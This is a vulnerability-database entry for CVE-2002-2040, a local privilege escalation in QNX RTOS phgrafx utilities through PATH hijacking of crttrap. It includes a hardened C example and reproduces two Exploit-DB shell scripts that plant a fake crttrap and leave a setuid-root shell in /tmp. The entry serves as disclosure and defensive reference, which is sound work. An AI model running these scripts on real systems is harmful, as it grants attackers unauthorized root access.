CVE-2002-2040
published 2002-12-31
Priority P424 · high · 7.2 (CVSS 2.0) · AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.08% (61.0th percentile)
The (1) phgrafx and (2) phgrafx-startup programs in QNX realtime operating system (RTOS) 4.25 and 6.1.0 do not properly drop privileges before executing the system command, which allows local users to execute arbitrary commands by modifying the PATH environment variable to reference a malicious crttrap program.
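A hardened form of the helper invocation this entry describes, as an added example that is not code from QNX or from the original advisory. The function name `run_helper_dropped`, the fixed `PATH=/bin:/usr/bin` value and the `/bin/sh` demo in `main` are assumptions; the arguments the real programs pass to crttrap are not on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern described in the advisory (arguments unknown, shown as "..."):
 *     system("crttrap ...");    // euid still 0, name resolved via caller's PATH
 * Hardened replacement (hypothetical helper name run_helper_dropped):
 * absolute path only, no shell, fixed environment, privileges dropped first.
 * Returns the helper's exit status, or -1 on refusal or error. */
int run_helper_dropped(const char *helper_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid;

    if (helper_path == NULL || helper_path[0] != '/')
        return -1;                       /* refuse PATH-relative names */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: drop to the real gid/uid permanently, group first. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        /* If the invoking user is not root, regaining root must fail. */
        if (getuid() != 0 && setuid(0) == 0)
            _exit(126);
        execve(helper_path, argv, clean_env);
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed demo: a hostile PATH in the caller must not reach the helper. */
    char *const check[] = { "sh", "-c", "test \"$PATH\" = /bin:/usr/bin", NULL };
    char *const bare[]  = { "crttrap", NULL };

    setenv("PATH", "/tmp:/bin:/usr/bin", 1);
    printf("relative name refused: %d\n", run_helper_dropped("crttrap", bare));
    printf("helper saw clean PATH: %d\n", run_helper_dropped("/bin/sh", check));
    return 0;
}
```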
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qnx | rtos | — | — |
| qnx | rtos | — | — |
No detection rules found.
Exploit-DB
QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation
exploitdb·2002-06-03
---
source: https://www.securityfocus.com/bid/4915/info
The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.
```sh
#!/bin/sh
#
# click advanced,done, apply, accept and done.
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/b
```
Exploit-DB
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Local Privilege Escalation
exploitdb·2002-06-03
---
source: https://www.securityfocus.com/bid/4916/info
The QNX phgrafx-startup utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.
```sh
#!/bin/sh
#
# click test,restore,continue
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/b
```
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/275218
http://www.iss.net/security_center/static/9257.php
http://www.securityfocus.com/bid/4915
http://www.securityfocus.com/bid/4916
Published: 2002-12-31